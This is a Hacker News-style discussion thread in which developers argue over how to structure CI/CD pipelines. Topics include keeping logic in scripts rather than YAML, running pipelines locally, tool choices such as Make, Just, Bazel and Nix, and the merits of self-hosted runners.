It's miles better than Jenkins and the horrors people created there. GitLab CI can at least be easily migrated to any other GitLab instance and stuff should Just Work because it is in the end not much more than self contained bash scripts, but Jenkins... is a clown show, especially for Ops people of larger instances. On one side, you got 50 plugins with CVEs but you can't update them because you need to find a slot that works for all development teams to have a week or two to fix their pipelines again, and on the other side you got a Jenkins instance for each project which lessens the coordination effort but you gotta worry about dozens of Jenkins instances. Oh and that doesn't include the fact many old pipelines aren't written in Groovy or, in fact, in any code at all but only in Jenkins's UI...
Github Actions however, I'd say for someone coming from GitLab, is even worse to work with than Jenkins.
6 days ago [-]
robinwassen 7 days ago [-]
Did a similar thing when we needed to do complex operations towards aws.
Instead of wrapping the aws cli command I wrote small Go applications using the boto3 library.
Removed the headaches when passing in complex params, parsing output and and also made the logic portable as we need to do the builds on different platforms (Windows, Linux and macOS).
noworriesnate 7 days ago [-]
I've used nuke.build for this in the past. This makes it nice for injecting environment variables into properties and for auto-generating CI YAML to wrap the main commands, but it is a bit of a pain when it comes to scaling the build. E.g. we did infrastructure as code using Pulumi, and that caused the build code to dramatically increase to the point the Nuke script became unwieldy. I wish we had gone the plain C# CLI app from the beginning.
ozim 7 days ago [-]
I don’t think it is insanity quite the opposite - insanity is trying to force everything in yaml or pipeline.
I have seen people doing absolutely insane setups because they thought they have to do it in yaml and pipeline and there is absolutely no other option or it is somehow wrong to drop some stuff to code.
motorest 7 days ago [-]
> I don’t think it is insanity quite the opposite - insanity is trying to force everything in yaml or pipeline.
I'm not sure I understood what you're saying because it sounds too absurd to be real. The whole point of a CICD pipeline is that it automates all aspects of your CICD needs. All mainstream CICD systems support this as their happy path. You specify build stages and build jobs, you manage your build artifacts, you setup how things are tested, deployed and/or delivered.
That's their happy path.
And you're calling the most basic usecases of a standard class if tools as "insanity"?
Please help me explain what point you are trying to make.
ozim 7 days ago [-]
In the article Strange Way to Enforce Status Checks with Merge Queue.
All aspects of your CICD pipeline - rebasing PRs is not 'basic CICD' need.
CICD pipeline should take a commit state and produce artifacts from that state, not lint and not autofix trivial issues.
Everything that is not "take code state - run tests - build - deploy (eventualy fail)" is insanity.
Autofixing/linting for example should be separate process waay before CICD starts. And people do stuff like that because they think it is part of integration and testing. Trying to shove it inside is insanity.
mst 7 days ago [-]
Honestly, "using the same language as the application" is often a solid choice no matter what the application is written in. (and I suspect that for any given language somebody might propose as an exception to that rule, there's more than one team out there doing it anyway and finding it works better for them than everything else they've tried)
7bit 7 days ago [-]
> The other thing I would add is consider passing in all environment variables as args. This makes it easy to see what dependencies the script actually needs, and has the bonus of being even more portable.
This is the dumbest thing I see installers do a lot lately.
no_wizard 7 days ago [-]
Am I an outlier in that not only do I find GitHub actions pleasant to use, but that most folks over complicate their CI/CD pipelines?
I've had to re-write alot of actions configurations over the last few years, and in every case, the issue was simply not thinking through the limits of the platform, or when things would be better to run as custom docker images (which you can do via GitHub Actions) etc.
It tends to be that folks want to shoehorn some technology into the pipeline that doesn't really fit, or they make these giant one shot configurations instead of running multiple small parallel jobs by setting up different configurations for different concerns etc.
davidham 7 days ago [-]
I'm with you! I kind of love GitHub Actions, and as long as I keep it to tools and actions I understand, I think it works great. It's super flexible and has many event hooks. It's reasonably easy to get it to do the things I want. And my current company has a pretty robust CI suite that catches most problems before they get merged in. It's my favorite of the CI platforms I have used.
gchamonlive 7 days ago [-]
The way that gitlab shines is just fundamentally better than GitHub actions.
This way I can code my pipeline and use the same infrastructure to isolate groups of jobs that compose a relevant functionality and test it in isolation to the rest of the pipeline.
I just wish components didn't have such a rigid opinion on folder structure, because they are really powerful, but you have to adopt gitlab prescription
rbongers 7 days ago [-]
In my opinion, unless if you need its ability to figure out when something should rebuild or potentially if you already use it, Make is not the right tool for the job. You should capture your pipeline jobs in scripts or similar, but Make just adds another language for developers to learn on top of everything. Make is not a simple script runner.
I maintained a Javascript project that used Make and it just turned into a mess. We simply changed all of our `make some-job` jobs into `./scripts/some-job.sh` and not only was the code much nicer, less experienced developers were suddenly more comfortable making changes to scripts. We didn't really need Make to figure out when to rebuild anything, all of our tools already had caching.
JanMa 7 days ago [-]
Make is definitely just my personal preference. If using bash scripts, Just, Taskfile or something similar works better for you then by all means use it.
The main argument I wanted to make is that it works very well to just use GitHub actions to execute your tool of choice.
DanHulton 7 days ago [-]
This is why I've become a huge fan of Just, which is just a command runner, not a build caching system or anything.
It allows you to define a central interface into your project (largely what I find people justify using Make for), but smoothes out so many of the weird little bumps you run into from "using Make wrong."
Plus, you can an any point just drop into running a script in a different language as your command, so it basically "supports bash scripts" too.
This. I don't know which guru came up with it but this is the 'one-click build' principle. If youcan't do that, you have a problem.
So if even remotely possible we write all CI as a single 'one-click' script which can do it all by itself. Makes developing/testing the whole CI easy. Makes changing between CI implementations easy. Can solve really nasty issues (think: CI is down, need to send update to customer) easily because if you want a release you just build it locally.
The only thing it won't automaticaly do out of the box is being fast, because obviously this script also needs to setup most of the build environment. So depending on the exact implementation there's variation in the split between what constitutes setting up a build environment and running the CI script. As in: for some tools our CI scripts will do 'everything' so starting from a minimal OS install. Whereas others expect an OS with build tools and possibly some dependencies already available.
xyzal 7 days ago [-]
I think it was mentioned as a part of the 'Joel test'
Yeah spot on, this was definitley it. I now remember reading this probably right after it came out and being somewhat proud to be able to tick most stuff of the list without ever being told directly to do so. But the 'Can you make a build in one step?' was not one of them so I figured that since the rest of the list made so much sense, I'd better get started on that one as well.
I also really like that most of this list is practical, low-level advice. No 'use tech X' or 'agile ftw', just basic stuff which automatically happens anyway if you'd opt to use tech X or agile - should those be the right tools for the job, but which would cause more friction if not.
tailspin2019 7 days ago [-]
25 years later and we’re still having to relearn some of his lessons!
cruffle_duffle 7 days ago [-]
At least we generally aren’t fighting “use source control”. Maybe the VCS used by the shop is dogshit but it’s better than nothing!
makeitdouble 7 days ago [-]
> * Invest time that your pipelines can run locally on a developer machine as well (as much as possible at least), otherwise testing/debugging pipelines becomes a nightmare.
Yes, a thousand time.
Deploy scripts are tougher to deal with, as they'll naturally rely on a flurry of environment variables, protected credentials etc.
But for everything else writing the script for local execution first, and generalizating them for CI one they run well enough is the absolute best approach. It doesn't even need to run in the local shell, having all the CI stuff in a dedicated docker image is fine if it requires specific libraries or env.
20thr 7 days ago [-]
I spend a lot of time in CI (building https://namespace.so) and I agree with most of this:
- Treat pipelines as code.
- Make pipelines parts composable, as code.
- Be mindful of vendor lock-in and/or lack of portability (it is a trade-off).
For on-promise: if you're already deeply invested in running your own infrastructure, that seems like a good fit.
When thinking about how we build Namespace -- there are parts that are so important that we just build and run internally; and there are others where we find that the products in the market just bring a tremendous amount of value beyond self-hosting (Honeycomb is a prime example).
Use the tools that work best for you.
LukaD 7 days ago [-]
> [...] use (shell scripts, make, just, doit, mage, whatever) as long as it is proper, maintainable code
I fully agree with the recommendation to use maintainable code. But that effectively rules out shell scripts in my oppinion. CI shell scripts tend to become big ball of mud rather quickly as you run into the limitations of bash. I think most devs only have superficial knowledge of shell scripts, so do yourself a favor and skip them and go straight to whatever language your team is comfortable with.
sgarland 7 days ago [-]
Maybe people should get better at shell, instead. Read the bash / zsh manual. Use ShellCheck.
int_19h 6 days ago [-]
Shellcode is just a horrible PL, period. Not only it's weird and unlike anything else out there, there's way too many footguns.
One can learn to use it to the point where it's usable to do advanced automation... but why, when there are so many better options available?
sgarland 6 days ago [-]
Because it’s never going away, and it’s always going to be there. It is the lowest common denominator. Also, a shell script generally doesn’t have any other dependencies (modulo writing one that calls jq or something). No risk of solver hell.
cnotv 7 days ago [-]
Once, a reliable and wise colleague told me "Use in CI what you use locally" and that has been the best devop advice that never failed me to save my time.
The second one has been, from someone else: if you can use anything else than bash, do that.
amtamt 7 days ago [-]
Try brainfuck...
Jokes aside... it's so trendy to bash bash that it's not funny anymore.
Bash is still quite reliable for work that usually gets done in CI, and nearly maintenance free if used well.
badmintonbaseba 6 days ago [-]
I prefer python there, although we do test/deploy on Windows too, so it's nice to have a common python script for Windows and Linux CI. Not interested in making bash work on Windows or scripting in powershell. And although it's a lot more awkward to use python than bash for invoking subprocesses, it's nicer in most other ways.
balls187 7 days ago [-]
These days, AI Copilots are quite good at helping write and maintain bash (and shell) scripts, that it's not much of a prolem.
psyclobe 7 days ago [-]
'* Write as much CI logic as possible in your own code. Does not really matter what you use (shell scripts, make, just, doit, mage, whatever) as long as it is proper, maintainable code.'
THIS 10000% percent.
jpgvm 7 days ago [-]
This is the way.
My personal favourite solution is Bazel specifically because it can be so isolated from those layers.
No need for Docker (or Docker in Docker as many of these solutions end up requiring) or other exotic stuff, can produce OCI image artifacts with `rules_oci` directly.
By requiring so little of the runner you really don't care for runner features, you can then restrict your CI/CD runner selection to just reliability, cost, performance and ease of integration.
otikik 7 days ago [-]
> * Avoid YAML as much as possible, period.
That's also a very valid takeaway for life in general
gabyx 3 days ago [-]
Ohh, @deng, my exact words and you are 100% right. Same experience, same conclusion:
- I would go even further: Do not use bash/python or any duck-typed lang. (only for simple projects, but better just dont get started).
- Leverage Nix (!! no its not a joke ecosystem) : devshells or/and build devcontainers out of it.
- Treat tooling code, ci code, the exact same as your other code.
- Maybe generate the pipeline for your YAML based CI system in code.
- If you use a CI system, gitlab, circle etc, use one which does not do stupid things with your containers (like Github: 4 years! old f** up: https://github.com/actions/runner/issues/863#issuecomment-25...)
Thats why we built our own build tool which does that, or at least helps us doing the above things:
Ohh, @deng, my exact words and you are 100% right. Same experience, same conclusion:
- I would go even further: Do not use bash/python or any duck-typed lang. (only for simple projects, but better just dont get started).
- Leverage Nix (!! no its not a joke ecosystem) : devshells or/and build devcontainers out of it.
- Treat tooling code, ci code, the exact same as your other code.
- Maybe generate the pipeline for your YAML based CI system in code.
- If you use a CI system, gitlab, circle etc, use one which does not do stupid things with your containers (like Github: 4 years! old f** up: https://github.com/actions/runner/issues/863#issuecomment-25...). Also one which lets you run dynamically generated pipelines.
Thats why we built our own build tool which does that, or at least helps us doing the above things:
I always thought it could be cool to use systemd as a CI agent replacement someday:
Each systemd service could represent a step built by running a script, and each service can say what it depends on, thus helping parallelize any step that can be.
I have not found anyone trying that so far. Is anybody aware of something similar and more POSIX/cross platform that allows writing a DAG of scripts to execute?
ozim 7 days ago [-]
Good insight, because that is just a complex issue - especially when there is team churn and everyone adds their parts in yaml or configuration.
Doesn’t matter Jenkins or actions - it is just complicated. Making it simpler is on devs/ops not the tool.
forrestthewoods 7 days ago [-]
> pipelines can run locally on a developer machine as well (as much as possible at least)
Facts.
However I’ll go a step further and say “only implement your logic in a tool that has a debugger”.
YAML is the worse. But shell scripts are second worst. Use a real language.
never_inline 7 days ago [-]
Python with click and PyYAML can go a long way - then you can build it as a CLI application and use the same from CI. In a java shop, picocli + graalvm probably. I wouldn't like Go for this purpose (against the conventional wisdom - because boilerplate and pretty bad debugging capabilities).
That said, if you absolutely need to use shell script for reasons, keep it all in single script, define logging functions including debug logs, rigorously check every constraint and variable, use shellcheck, factor the code well into functions - I should sometimes write a blog post about it.
folmar 7 days ago [-]
There is a debugger for bash: https://github.com/Trepan-Debuggers/bashdb
Not that I'm recommending 10k-line programs in bash, but a debugger is useful when you need it.
sgarland 7 days ago [-]
Shell is a very real language, and it has a debugger; it’s called set -x and/or strace.
forrestthewoods 6 days ago [-]
Like I said, use something with a real debugger.
julienEar 7 days ago [-]
Completely agree. Keeping CI logic in actual code instead of YAML is a lifesaver. The GitHub Actions security issues just reinforce why self-hosted runners are the way to go.
crabbone 7 days ago [-]
First of all, I cannot agree more, given what we have today.
Unfortunately, this isn't a good plan going forward... :( Going forward I'd wish for a tool that's as ubiquitous as Git, has good integration with editors like language servers, can be sold as a service or run completely in-house. And it would allow defining the actions of the automated builds and tests, have a way of dealing with releases, expose interface for collecting statistics, integrate with bug tracing software for the purpose of excluding / including tests in test runs, allowed organizing tests in groups (eg. sanity / nightly / rc).
The problem is that tools today don't come anywhere close to being what I want for CI, neither free nor commercial tools aren't even going in the desired direction. So, the best option is simply to minimize their use.
iloveitaly 7 days ago [-]
I very much agree here. I've had the best luck when there is as little as possible config in CI as possible:
- mise for lang config
- direnv for environment loading
- op for secret injection
- justfile for lint, build, etc
Here's a template repo that I've been working on that has all of this implemented:
Why does YAML have any traction when JSON is right there? I'm an idiot amateur and even I learned this lesson; my 1 MB YAML file full of data took 15 seconds to parse each time. I quickly learned to use JSON instead, takes half a second.
12_throw_away 7 days ago [-]
> Why does YAML have any traction when JSON is right there?
Because it has comments, which are utterly essential for anything used as a human readable/writable configuration file format (your use case, with 1 MB of data, needs a data interchange format, for which yes JSON is at least much better than YAML).
fireflash38 6 days ago [-]
JSON is valid YAML.
YAML has comments.
YAML is easily & trivially written by humans.
JSON is easily & trivially written by code.
My lesson learned here? When generating YAML, instead generate JSON. If it's meant to be read and updated by humans, use something that can communicate to the humans (comments). And don't use YAML as a data interchange format.
sofixa 7 days ago [-]
Because YAML, as much as it sucks, is relatively straightforward to write by humans. It sucks to read and parse, you can make tons of small mistakes that screw it up entirely, but it's still less cruft than tons of needless "": { } .
For short configs, YAML is acceptable-ish. For anything longer I'd take TOML or something else.
qweiopqweiop 7 days ago [-]
Can you explain YAML? I've found declarative pipelines with it have been... fine?
deng 7 days ago [-]
YAML is fine for what it is: a markup language. I have no problem with it being used in simple configuration files, for instance.
However, CI is not "configured", it is coded. It is simply the wrong tool. YAML was continuously extended to deal with that, so it developed into much more than just "markup", but it grew into this terrible chimera. Once you start using advanced features in GitLab's YAML like anchors and references to avoid writing the same stuff again and again, you'll notice that the whole tooling around YAML is simply not there. How does the resulting YAML look like? How do you run this stuff locally? How do you debug this? Just don't go there.
You will not be able to avoid YAML completely, obviously, but use it the way it was originally intended to.
LeonM 7 days ago [-]
> CI is not "configured", it is coded.
Finally! I was always struggling to explain to others why YAML is OK-ish as a language, but then never seems to work well for the things people tried doing with it. Especially stuff that needs to run commands, such as CI.
> How does the resulting YAML look like? How do you run this stuff locally? How do you debug this? Just don't go there.
Agreed. GitHub actions, or any remote CI runner for that matter, makes the problem even worse. The whole cycle of having to push CI code, wait 10 minutes while praying for it to work, still getting an error, trying to figure out the mistake, fixing one subtle syntax error, then pushing the code again in the hope that that works is just a terrible workflow. Massive waste of time.
> You will not be able to avoid YAML completely, obviously, but use it the way it was originally intended to.
Even for configurations YAML remains a pain, unfortunately. It could have been great for configs, but in my experience the whole strict whitespace (tabs-vs-spaces) part ruined it. It isn't a problem when you work from an IDE that protects you from accidentally using tabs (also, auto-formatting for the win!) but when you have to write YAML configuration (for example: Netplan) on a remote server using just an editor it quickly becomes a game of whack-a-mole.
motorest 7 days ago [-]
> Especially stuff that needs to run commands, such as CI.
I don't understand what problem you could possibly be experiencing. What exactly do you find hard about running commands in, say, GitLab CICD?
cmsj 7 days ago [-]
So, I'm not interested in the debate about the correctness (or otherwise) of yaml as a declarative programming language, but I will say this...
iterating a GitHub Actions workflow is a gigantic pain in the ass. Capturing all of the important logic in a script/makefile/whatever means I can iterate it locally way faster and then all I need github to do is provision an environment and call my scripts in the order I require.
motorest 7 days ago [-]
> iterating a GitHub Actions workflow is a gigantic pain in the ass. Capturing all of the important logic in a script/makefile/whatever means I can iterate it locally way faster and then all I need github to do is provision an environment and call my scripts in the order I require.
When it gets realistic, with conditions, variable substitutions, etc., it ends up being 20 steps in a language that isn't shell but is calling shell over and over again, and can't be run outside of CI. Whereas, if you just wrote one shell script, it could've done all of those things in one language and been runnable locally too.
motorest 6 days ago [-]
> When it gets realistic, with conditions, variable substitutions, etc.,
What exactly do you find hard in writing your own scripts with a scripting language? Surely you are not a software developer who feels conditionals and variable substitutions are hard.
> it ends up being 20 steps in a language that isn't shell but is calling shell over and over again, and can't be run outside of CI.
Why are you writing your CICD scripts in a way that you cannot run them outside of a CICD pipeline? I mean, you're writing them yourself, aren't you? Why are you failing to meet your own requirements?
If you have a requirement to run your own scripts outside of a pipeline, how come you're not writing them like that? It's CICD 101 that those scripts should be runnable outside of the pipeline. From your description, you're failing to even follow the most basic recommendations and best practices. Why?
That doesn't sound like a YAML problem, does it?
kbolino 6 days ago [-]
This is not about YAML in some general or abstract sense, it is about a YAML-based domain-specific language. If you think this is just about YAML, you are hyper-focused on the wrong detail.
In order to use this domain-specific language properly, you first must learn it, and learning YAML is but a small part of that. Moreover, it is not immediately obvious that, once you know it, you actually want to avoid it. But you can't avoid it entirely, because it is the core language of the CI/CD platform. And you can't know how to avoid it effectively until you have spent some time just using it directly. Simplicity comes from tearing away what is unnecessary, but to discern necessary from unnecessary requires judgment gained by experience. There is no world in which this knowledge transfers immediately, frictionlessly, and losslessly.
Furthermore, there is a lot that GitHub (replace with platform of choice) could have done to make this better. They largely have no incentive to do so, because platform lock-in isn't a bad thing to the platform owner, and it's a nontrivial amount of work on their part, just as it is a nontrivial amount of work on your part to learn and use their platform in a way that doesn't lock you into it.
maratc 7 days ago [-]
Q: How do you determine what date it was 180 days ago?
A: Easy! You just spin up a Kubernetes pod with Alpine image, map a couple of files inside, run a bash script of "date" with some parameters, redirect output to a mapped file, and then read the resulting file. That's all. Here's a YAML for you. Configuration, baby!
(based on actual events)
jiggawatts 6 days ago [-]
At first I assumed you were kidding, then I realised that sadly… you probably weren’t.
maratc 6 days ago [-]
I wasn’t. This goes to show that when all you have is a YAML hammer, every problem has to look like a YAML-able nail. Still there would be people who would say I’m “blaming my tools” and “everything is covered in chapter 1 of yaml for dummies.”
tom_ 7 days ago [-]
Nothing significant on the face of it and I think that's pretty much exactly what's being suggested: don't have anything particularly interesting in the .yml file, just the bare minimum plus some small number of uncomplicated script invocations to install dependencies and actually do the build.
(Iterating even on this stuff by waiting for the runner is still annoying though. You need to commit to the repo, push, and wait. Hence the suggestion of having scripts that you can also run locally, so you can test changes locally when you're iterating on them. This isn't any kind of guarantee, but it's far less annoying to do (say) 15 iterations locally followed by the inevitable extra 3 remotely than it is having to do all 18 remotely, waiting for the runner each time then debugging it by staring at the output logs. Even assuming you'd be able to get away with as few as 15 given that you don't have proper access to the machine.)
bastardoperator 7 days ago [-]
But GitHub recommends that, so if people don't follow best practices, and then complain when the docs are clear, who's at fault? The person writing against a system they don't understand because they haven't read the docs or the people who recommend what you're professing in the docs?
Nothing in that document states anything remotely like the antecedent of "that", which was:
> don't have anything particularly interesting in the .yml file, just the bare minimum plus some small number of uncomplicated script invocations to install dependencies and actually do the build
It is a very basic "how to" with no recommendations.
Moreover, they directly illustrate a bad practice:
- name: Run the scripts
run: |
./my-script.sh
./my-other-script.sh
This is not running two scripts, this is running a shell command that invokes two scripts, and has no error handling if the first one fails. If that's the behavior you want, fine, but then put it in one shell script, not two. What am I supposed to do with this locally? If the first shell script fails, do I need to fix it, or do I just proceed on to the second one?
bastardoperator 6 days ago [-]
It does even if you don't like it. You can put your logic in a script and execute that. That is what is being conveyed here in a blistering simple fashion. You could also make it one script, or two or three, you could even break those out into steps.
This is invoking a shell and that's how shells typically work, one command at a time. Would it make you feel better if they added && or used a step like they also recommend to split these out? You can put the error handling in your script if need be, that's on you or the reader, most CI agents only understand true/false or in this case $?.
Nobody said they want that behavior, they're showing you the behavior. They actually show you the best practice behavior first, not sure if you didn't read that or are purposely omitting it. In fact, the portion you highlight, is talking about permissions, not making suggestions.
- name: Run a script
run: ./my-script.sh
- name: Run another script
run: ./my-other-script.sh
kbolino 6 days ago [-]
This is not a discussion about what's possible, it's a discussion about what's best. You can write your own opinion here, and it seems like we're in violent agreement, but that doesn't make our opinion GitHub's opinion.
That page is just one small part of a much larger reference document, and it doesn't seem opinionated at all to me. Plus there are dozens of other examples elsewhere in the same reference that are not simple invocations of one shell script and nowhere are you admonished not to do things that way.
bastardoperator 6 days ago [-]
And they show those patterns first. You had to take an example that is clearly about script permissions and misrepresent it. Yeah, it's not opinionated, it's fact. That's how it works...
kbolino 6 days ago [-]
At best, we are talking past each other. At worst, you are misreading everything I write to play gotcha games. Whatever, I'm glad you were able to figure out exactly the right things to do from a first read of a large and complex document that doesn't say anything of the sort. As for the rest of us mere mortals, we're stuck figuring these things out by trial and error, or even worse, having to pick up the pieces from somebody else's left-behind mistakes.
tom_ 6 days ago [-]
It's the reference manual. It's just a list of things you can do. If you like this specific thing, and think this should be the main way you express your build process, great. I think that too. Meanwhile with GitHub Actions you can also do this big pile of shit that the manual also describes: https://docs.github.com/en/actions/writing-workflows/choosin...
motorest 7 days ago [-]
> However, CI is not "configured", it is coded.
No, it really isn't. I'll clarify why.
Pretty much all pipeline services share the same architecture pattern:
* A pipeline run is comprised of one or more build jobs,
* Pipeline runs are triggered by external events
* Build jobs have contexts and can output artifacts,
* Build jobs are grouped into stages,
* Stages are organized as a directed graph,
* Transitions between stages in the directed graph is ruled by a set of rules, some supported by default (i.e., if a job fails then the stage fails) complemented by custom rules (manual or automatic approvals, API tests, baking periods, etc).
This is the textbook scenario ideal for DSLs. You already are bound to an architecture pattern, this there is no point of reinventing the wheel each time. Just specify your stages and which jobs run as part of each stage, manage artifacts and promotion logic, and you're done.
You do not need to take my word for it. Take a look at GitLab CICD for a pipeline with build, test, and delivery stage. See what a mess you will put together if you support the same feature set with whatever scripting language you choose. There is no discussion or debate.
baq 7 days ago [-]
I can’t understand how you can say DSL and YAML in the same sentence and say it’s fine. YAML is a serialization format. A bad DSL would be a welcome improvement over GHA pipelines in YAML. You’re fundamentally confusing concepts here, you want to restrict flexibility (I agree with that btw) by using a simplistic language, but what it actually does is increase complexity of the code comprising the pipeline with zero hard restrictions.
motorest 7 days ago [-]
[flagged]
maratc 7 days ago [-]
> * Stages are organized as a directed graph
The problem starts when that graph cannot be determined in advance and needs to be computed in runtime. It's a bit better when it's possible to compute that graph as a first step, and it's a lot worse when one needs to do a couple of stages before being able to compute the next elements of the graph. The graph computation is terrible enough in e.g. Groovy, but having to do it in YAML is absolutely horrendous.
> Take a look at GitLab CICD for a pipeline with build, test, and delivery stage
Yeah, if your workflow fits in a kindergarten example of "build, test, and delivery", then yeah, it's YAML all the way baby. Not everyone is so fortunate.
duped 7 days ago [-]
It's funny how you say this is the textbook scenario ideal for DSLs and I see it as the textbook scenario ideal for a real programming language. Organizing stages as a DAG with "transition ruled by a set of rules" is bonkers, I know how to write code with conditional logic and subroutine calls, give that to me.
Wrapping it in a DSL encoded as YAML has zero benefit other than it being easier for a team with weak design skills to implement and harder for users to migrate off of.
deng 7 days ago [-]
We don't disagree here. There are tools which support you in doing this, and I mentioned a few of them in my post (Make, Just, doit, mage). There are many more. I also think that re-inventing these tools is a waste of time, but it is still better than shoehorning this into YAML. You seem to think YAML is some kind of DSL for pipelines. It really is not.
Lammy 7 days ago [-]
> YAML is fine for what it is: a markup language.
Pardon my pedantry, but the meaning of YAML's name was changed from the original “Yet Another Markup Language” to “YAML Ain't Markup Language” in a 2002 draft spec because YAML is, in fact, not a markup language :)
> However, CI is not "configured", it is coded. . . . YAML was continuously extended to deal with that, so it developed into much more than just "markup", but it grew into this terrible chimera.
Brings to mind the classic "Kingdom of Nouns" [0] parable, which I read to my kid just last week. The multi-line "run" nodes in GitHub actions give me the heebie-jeebies, like how MUMPS data validation was maintained in metadata of VA-Fileman [1].
I've created multiple actions, reusable, composite, along with multiple Jenkins plugins and CircleCI Orbs. I disagree, code your actions, your jenkins plugins, your orbs, whatever. Those are just code wrappers that expose configuration via YAML or Pipeline DSL. Agreed, coding in YAML is pretty bad, but ultimately it's a choice.
I will take the Actions path 100% of the time. Building your own action is so insanely simple it makes me wonder if the people complaining about YAML understand the tooling because it's entirely avoidable. It also coincides with top comments about coding your own CI, if you're just "using" YAML you're barely touching the surface.
ruuda 7 days ago [-]
If you have to deal with tools that need to be configured with yaml, give https://rcl-lang.org/ a try! It can be "coded" to avoid duplication, with real variables, functions, and loops. It can show you the result that it evaluates to. It can do debug tracing, and it has a built-in build command to generate files like GitHub Actions workflows from an RCL file.
crabbone 7 days ago [-]
YAML's problems:
* Very easy to write the code you didn't mean to, especially in the context of CI where potentially a lot of languages are going to be mixed, a lot of quoting and escaping. YAML's string literals are a nightmare.
* YAML has no way to express inheritance. Nor does it have a good way to express variables. Both are usually desperately needed in CI scripts, and are usually bolted on top with some extra-language syntax (all those dollars in GitHub actions, Helm charts, Ansible playbooks etc.)
* Complexity skyrockets compared to the size of the file. I.e. in a language like C you can write a manageable program with millions of lines of code. In YAML you will give up after a few tens of thousands of lines (similar to SQL or any other language that doesn't have modules).
* Whitespace errors are very hard to spot and fix. Often whitespace errors in YAML result in valid YAML which, however, doesn't do what you want...
dharmab 7 days ago [-]
1. The YAML spec is extremely complex with some things being ambiguous. You might not notice this if your restrict yourself to a small subset of the language. But you will notice it when different YAML libraries and programming languages interpret the same YAML file as different content.
2. Trying to encode logic and control flow in a YAML document is much more difficult than writing that flow in a "real" programming language. Debugging is especially much easier in "real" languages.
maratc 7 days ago [-]
You can't put a breakpoint in YAML. You can't evaluate variables in YAML. You can't print debugging info from YAML. You can't rerun YAML from some point.
YAML is great for the happy-flow where everything works. It's absolutely terrible for any other flow.
int_19h 6 days ago [-]
FWIW there's no reason why you shouldn't be able to put a breakpoint in pipeline YAML. I'm not aware of anyone implementing such a thing, but a DAP adapter that VSCode could attach to remotely should be pretty straightforward.
MSBuild, for example, is all XML, but it has debugging support in Visual Studio complete with breakpoints and expression evaluation.
motorest 7 days ago [-]
> You can't put a breakpoint in YAML. You can't evaluate variables in YAML. You can't print debugging info from YAML. You can't rerun YAML from some point
It's a DSL. There is no execution, only configuration. The only thing that's executed are the custom scripts you create yourself, and any intro tutorial on the subject will eventually teach you that if you want to run anything beyond a single straight-forward command then you should move those instructions to a shell script to make them testable and reproducible.
Things are so simple and straight forward that you need to go way out of your way to create your own problems.
I wonder how many people in this discussion are blaming the tools when they even bothered to learn the very basics.
maratc 7 days ago [-]
Your attitude of "how is everyone so stupid" does not help the discussion.
> It's a DSL. There is no execution, only configuration.
Jenkins pipelines are also DSL. I still can print out debugging information from them. "It's a DSL" is not an excuse for being a special case of shitty DSL.
> any intro tutorial on the subject will eventually teach you
Do these tutorials have a chapter on what to do when you join a company with 500 engineers and a ton of YAMLs that are not written in that way?
> you should move those instructions to a shell script to make them testable
Yeah, no. How am I supposed to test my script that is supposed to run on Github-supplied runner with a ton of injected secrets and Github-supplied JSON of 10,000 lines, when I don’t have the runner, the secrets, or the JSON?
dharmab 7 days ago [-]
> There is no execution, only configuration.
The YAML is fed into an agent which reads it to decide what to execute. Any time you change the control flow of a system by changing data, you are doing a form of programming.
fergie 7 days ago [-]
As a developer based in Norway, one fairly major drawback to YAML is the way that it processes the language code for Norwegian ("no").
LeonM 7 days ago [-]
The Norwegian ISO3166 code colliding with the English word 'no' is not a YAML problem per se, I've been bitten by that a few times in other situations as well.
For example: Stripe uses constants for types of tax registration numbers (VAT/GST/TIN, etc.). So there is EU_VAT for European VAT numbers, US_TIN for US tax identification numbers, etc. But what value to use for tax-exempt organisations that don't have a tax number? Well... guess how I found out about NO_VAT...
On the bright side, I did learn that way that although Norway is in the Schengen zone, apparently they are not part of the EU (hence the separation of EU_VAT and NO_VAT). I guess the 'no' name collision has taught many developers something about Norway :-)
marcusramberg 7 days ago [-]
That particular pain was fixed in yaml 1.2 :)
withinboredom 7 days ago [-]
TIL I learned that yaml has versions and now I'm wondering what version of yaml parsers are running where. I think I might be on a new level of hell.
It would be better to delete your comment so nobody else has to has to ever have this crisis.
imp0cat 7 days ago [-]
Depends on the complexity of your pipeline.
alex_suzuki 7 days ago [-]
> * Always use your own runners, on-premise if possible
Why? I understand it in cases where security is critical or intellectual property is at stake. Are you talking about "snowflake runners" or just dumb executors of container images?
saidinesh5 7 days ago [-]
Caching is nicer on own runners. No need to redownload 10+GB of "development container images" just to build your 10 lines of changed code.
With self hosted Gitlab runners it was almost as fast as doing incremental builds. When your build process can take like 15-20 minutes (medium sized C++ code base), this brought down the total time to 30 seconds or so.
imp0cat 7 days ago [-]
This. Your own runners can cache everything (docker caches, apt caches, ccache outputs...) and can also share the compilation load (icecc for c++). All that gives 5x-10x speed boost.
madeofpalk 7 days ago [-]
This is true because your CI steps will be running on a lower number of physical machines, ensuring higher cache hits?
saidinesh5 7 days ago [-]
Kind of - you can also pin runners.("This workflow runs on this runner always"). And caching just means not deleting the artifacts from the file system from the previous runs.
Imagine building Android - even "cloning the sources" is 200GB of data transfer, build times are in hours. Not having to delete the previous sources and doing an incremental build saves a lot of everything.
imp0cat 1 days ago [-]
Gitlab also has some tips here: https://docs.gitlab.com/ci/caching/ on using shared caches, which can help in some scenarios, especially runners in Kubernetes that are ephemeral, ie. created just before a job starts and destroyed afterward.
tldr; "A cache is one or more files a job downloads and saves. Subsequent jobs that use the same cache don’t have to download the files again, so they execute more quickly."
It will probably still be slower than a dedicated runner, but possibly require less maintenance ("pet" runner vs "cattle" runner).
deng 7 days ago [-]
It obviously depends on your load. Fast pipelines matter, so don't run them on some weak cloud runner with the speed of a C64. Fast cloud runners are expensive. Just invest some money and buy or at least rent some beefy servers with lots of cores, RAM and storage and never look back. Use caches for everything to speed up things.
Security is another thing where this can come in handy, but properly firewalling CI runners and having mirrors of all your dependencies is a lot of work and might very well be overkill for most people.
zoobab 7 days ago [-]
"Fast cloud runners are expensive."
Buy a cheap Ryzen, and put it on your desk, that's a cheap runner.
withinboredom 7 days ago [-]
30 bucks a month on hetzner for a dedicated machine with 12-16 cores and 64 gb of ram and unlimited 1gbps bandwidth.
crabbone 7 days ago [-]
Debugging and monitoring. When the runner is somewhere else, and is shared nobody is going to give you full access to the machine.
So many times I was biting my fingers not being able to figure out the problems GitHub runners were having with my actions and was unable to investigate.
7 days ago [-]
carlmr 6 days ago [-]
>Invest time that your pipelines can run locally on a developer machine as well (as much as possible at least), otherwise testing/debugging pipelines becomes a nightmare.
